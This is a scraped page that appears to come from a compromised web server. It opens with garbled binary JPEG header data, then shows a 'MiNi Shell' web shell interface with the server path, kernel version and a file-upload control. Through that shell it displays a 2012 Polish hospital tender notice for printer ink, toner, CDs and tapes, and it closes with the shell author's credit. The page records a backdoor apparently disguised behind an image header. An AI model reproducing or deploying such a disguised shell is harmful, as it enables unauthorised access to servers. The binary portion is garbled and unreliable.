JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/149899-N-2012.html

<p class="kh_header"><b>Gdynia: Przedmiotem niniejszego zamówienia są sukcesywne dostawy fabrycznie nowych tuszy, tonerów, folii do faksów, taśm barwiących, bębnów, płyt CD i DVD oraz taśm magnetycznych na potrzeby Szpitala Miejskiego im. J. Brudzińskiego.</b><br>
<b>Numer ogłoszenia: 149899 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Miejski im. J. Brudzińskiego , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 058 6207501, faks 058 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szpitalgdynia.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia są sukcesywne dostawy fabrycznie nowych tuszy, tonerów, folii do faksów, taśm barwiących, bębnów, płyt CD i DVD oraz taśm magnetycznych na potrzeby Szpitala Miejskiego im. J. Brudzińskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia są sukcesywne dostawy fabrycznie nowych tuszy, tonerów, folii do faksów, taśm barwiących, bębnów, płyt CD i DVD oraz taśm magnetycznych na potrzeby Szpitala Miejskiego im. J. Brudzińskiego. 
2.	Szczegółowy opis przedmiotu zamówienia, zestawienie wymaganych parametrów granicznych  oraz ilości poszczególnego asortymentu zawiera załącznik nr 1 b do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2, 30.23.47.00-5, 30.12.51.00-2, 30.12.51.10-5, 30.12.43.00-7, 30.19.23.20-0, 30.19.23.34-6, 30.19.23.10-7, 30.19.23.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do postępowania jest zobowiązany do wniesienia wadium w następującej wysokości, w zakresie następujących pakietów:
Pakiet 1 -  1.200,00 zł;
Pakiet 4 -  2.000,00 zł.
2.	Wadium powinno być wniesione najpóźniej do chwili składania ofert.
3.	Wadium może zostać wniesione w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2010 r. Nr 240, poz. 1603).
4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: FORTIS BANK POLSKA S.A. PL 66 1600 1114 0004 0707 8076 0152
z podaniem tytułu wadium - przetarg, znak: SM/ZP/251/N/41/2012 - DO - sukcesywne dostawy fabrycznie nowych tuszy, tonerów, folii do faksów, taśm barwiących, płyt CD i DVD oraz taśm magnetycznych. Chwilą wniesienia wadium jest data uznania rachunku Zamawiającego.
5.	W przypadku wadium wnoszonego w formie niepieniężnej oryginał dokumentu należy złożyć w opisanej kopercie wraz z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego, wykonawcy składają wraz z ofertą:
1)	 W odniesieniu do pakietu nr 1, poz. nr 2 i 3, Wykonawca załączy następujące dokumenty:
a)	Poz. nr 2 (CD, printable) - certyfikat zapewnienia jakości zgodny z aneksem VI Dyrektywy 93/42/CCE (Dyrektywa dotycząca wyrobów medycznych)
b)	Poz. nr 3 ( DVD, printable) - certyfikat zapewnienia jakości zgodny z aneksem VI Dyrektywy 93/42/CCE (Dyrektywa dotycząca wyrobów medycznych)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy mogą dotyczyć:
1)	wynagrodzenia 
2)	częstotliwości dostaw, miejsca dostaw,
3)	zmiany cen asortymentu wskazanego w umowie,
4)	zmiany nazwy produktu przy zachowaniu jego parametrów w sytuacji, gdy produkt zostanie wycofany z produkcji, lub wprowadzony do sprzedaży przez producenta produkt zmodyfikowany / udoskonalony, przy czym zmiana ta nie może powodować wzrostu ceny zawartej w ofercie,
5)	wydłużenia terminu obowiązywania umowy, w sytuacji nie zrealizowania całego asortymentu będącego przedmiotem umowy w pierwotnym terminie. 
2.	Zmiany, o których mowa w ust. 2 mogą być dokonane w następujących przypadkach:
1)	ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe  netto pozostaną bez zmian,
2)	w zakresie, o którym mowa w ust. 1 pkt. 3, w przypadku:
a)	zmian wprowadzonych przez producentów, obniżki marży,
b)	zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3)	w przypadku zmiany przepisów prawa mających wpływ na warunki umowy
4)	jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.
3.	Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski-gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski im. J. Brudzińskiego w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2012 godzina 10:00, miejsce: Szpital Miejski im. J. Brudzińskiego w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Płyty CD i DVD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Nośnik danych CD	7000 szt.
2	Nośnik danych CD/ printable	43000 szt.
3	Nośnik danych DVD/printable	1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1, 30.23.44.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Taśma magnetyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Taśma magnetyczna typu LTO-3 400/800 GB	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.47.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tusze do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Tusz do urządzenia Canon PIXIMA IP1500 (czarny) lub równoważny	10szt.
2	Tusz do urządzenia Canon PIXIMA IP1500 (kolor) lub równoważny	15 szt.
3	Tusz do urządzenia Canon PIXIMA mp150 (czarny) lub równoważny	10 szt.
4	Tusz do urządzenia Canon PIXIMA mp150 (kolor) lub równoważny	5 szt.
5	Tusz do urządzenia HP Deskjet 1120C (kolor - tusz HP 23) lub równoważny	4 szt.
6	Tusz do urządzenia HP Deskjet 2050A (czarny) lub równoważny	8 szt.
7	Tusz do urządzenia HP Deskjet 2050A (kolor) lub równoważny	8 szt.
8	Tusz do urządzenia HP Deskjet 710c (czarny) lub równoważny	15 szt.
9	Tusz do urządzenia HP Deskjet 840c/845c (kolor) lub równoważny	10 szt.
10	Tusz do urządzenia HP Deskjet 840c/845c/920c (czarny) lub równoważny	35 szt.
11	Tusz do urządzenia HP Deskjet 920c (kolor) lub równoważny	 20 szt.
12	Tusz do urządzenia HP Deskjet D4260 (czarny) lub równoważny	7 szt.
13	Tusz do urządzenia HP Deskjet D4260 (kolor) lub równoważny	7 szt.
14	Tusz do urządzenia HP PSC 1315 (czarny) lub równoważny	25 szt.
15	Tusz do urządzenia HP PSC 1315 (kolor) lub równoważny	10 szt.
16	Tusz do urządzenia HP PSC 1410 (czarny) lub równoważny	8 szt.
17	Tusz do urządzenia HP PSC 1410 (kolor) lub równoważny	5 szt.
18	Tusz do urządzenia HP PSC 1510 (czarny) lub równoważny	6 szt.
19	Tusz do urządzenia HP PSC 1510 (kolor) lub równoważny	6 szt. 
20	Tusz do urządzenia Lexmark X5650 (czarny) lub równoważny	3 szt.
21	Tusz do urządzenia Lexmark X5650 (kolor) lub równoważny	3 szt.
22	Tusz do urządzenia Lexmark X9575 (czarny) lub równoważny	2 szt.
23	Tusz do urządzenia Lexmark X9575 (kolor) lub równoważny	2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tonery do drukarek, kopiarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Toner do urządzeniaBrother 2920 (toner) - fax lub równoważny	12 szt.
2.	Toner do urządzenia Brother HL-2035
lub równoważny	3 szt.
3.	Toner do urządzenia Brother MFC 7320 lub równoważny	12 szt.
4.	Toner do urządzenia Canon ir 1022A
lub równoważny	6 szt.
5.	Toner do urządzenia Canon LBP 3010
lub równoważny	12 szt.
6.	Toner do urządzenia Canon NP-1020
lub równoważny	6 szt.
7.	Bęben do urządzenia Canon PC 860
 lub równoważny	6 szt.
8.	Toner do urządzenia Gestetner 3222
lub równoważny	18 szt.
9.	Toner do urządzenia HP Laserjet 1000/3380/3300
lub równoważny	12 szt.
10.	Toner do urządzenia HP Laserjet 1010/1015/1018/1022n/305
lub równoważny	85 szt.
11.	Toner do urządzenia HP Laserjet 1100
 lub równoważny	20 szt.
12.	Toner do urządzenia
lub równoważnyHP Laserjet 1320 	10 szt.
13.	Toner do urządzenia HP Laserjet 2550n (cyan)  lub równoważny	2 szt.
14.	Bęben do urządzenia HP Laserjet 2550n (czarny)  lub równoważny	5 szt.
15.	Toner do urządzenia HP Laserjet 2550n (magenta)
lub równoważny	2 szt.
16.	Toner do urządzenia HP Laserjet 2550n (żółty)
lub równoważny	2 szt.
17.	Toner do urządzenia HP Laserjet 4250n lub równoważny	4 szt.
18.	Toner do urządzenia HP Laserjet CP1215/CP1515 (cyan)
lub równoważny	12 szt.
19.	Toner do urządzenia HP Laserjet CP1215/CP1515 (czarny)
lub równoważny	6 szt.

20.	Toner do urządzenia HP Laserjet CP1215/CP1515 (magenta)
lub równoważny	12 szt.
21.	Toner do urządzenia HP Laserjet CP1215/CP1515 (żółty)
lub równoważny	12 szt.
22.	Toner do urządzenia HP Laserjet M1522n/M1120
lub równoważny	40 szt.
23.	Toner do urządzenia HP Laserjet P1005 lub równoważny	70 szt.
24.	Toner do urządzenia HP Laserjet P1102w lub równoważny	85 szt.
25.	Toner do urządzenia HP Laserjet P1566 lub równoważny	36 szt.
26.	Toner do urządzenia HP Laserjet P2015dn lub równoważny	18 szt.
27.	Toner do urządzenia HP Laserjet P2055  lub równoważny	60 szt.
28.	Toner do urządzenia Konica Minolta Bizhub 130f  lub równoważny	12 szt.
29.	Toner do urządzenia Konica-Minolta 4021  lub równoważny	4 szt.
30.	Toner do urządzenia Konica-Minolta Magicolor 2550 (cyan)
lub równoważny	18 szt.
31.	Toner do urządzenia Konica-Minolta Magicolor 2550 (czarny)
równoważny	18 szt.
32.	Toner do urządzenia Konica-Minolta Magicolor 2550 (magenta)
 lub równoważny	18 szt.
33.	Toner do urządzenia Konica-Minolta Magicolor 2550 (żółty)
 lub równoważny	18 szt.
34.	Toner do urządzenia Ricoh Aficio 1022 lub równoważny	35 szt.
35.	Toner do urządzenia Samsung ML-1640  lub równoważny	20 szt.
36.	Toner do urządzeniaSamsung ML-1710 lub równoważny	6 szt.
37.	Toner do urządzenia Samsung ML-2010 / ML-1610 / SCX - 4521f
lub równoważny	24 szt.
38.	Toner do urządzenia Samsung SCX-4200 lub równoważny	8 szt.
39.	Toner do urządzenia Sharp AR-5012
lub równoważny	4 szt.
40.	Toner do urządzenia Sharp AR-5420
lub równoważny	4 szt.
41.	Toner do urządzenia Xerox Workcentre 3220
lub równoważny	30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Bębny światłoczułe do drukarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bęben do urządzenia Brother 2920 (bęben) - fax lub równoważny 	4 szt.
2	Bęben do urządzenia Brother MFC 7320 lub równoważny	4 szt.
3	Bęben do urządzenia Canon ir 1022A lub równoważny	2 szt.
4	Bęben do urządzenia HP Laserjet 2550n (bęben) lub równoważny	4 szt.
5	Bęben do urządzenia Konica-Minolta Magicolor 2550 (bęben) lub równoważny	6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.43.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Taśmy i folie do drukarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	folia do urządzenia Panasonic KX-FC 268 lub równoważny	12
2	folia do urządzenia Panasonic KX-FP 363 lub równoważny	12 szt.
3	folia do urządzenia OKI Microline 5520 lub równoważny	12 szt.
4	folia do urządzenia OKI Microline 521 Elite lub równoważny	12 szt.
5	folia do urządzenia Epson LX-300 lub równoważny	12 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.20-0, 30.19.23.40-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Taśmy do maszyn do pisania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	taśma do urządzenia Quasar SQ 1000 lub równoważna	12 szt.
2	taśma do urządzenia Optima SP20 lub równoważna	60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Taśma do zgrzewarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	taśma do urządzenia Zgrzewarka rotacyjna HAWO HM 850 DC-V lub równoważna	15 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com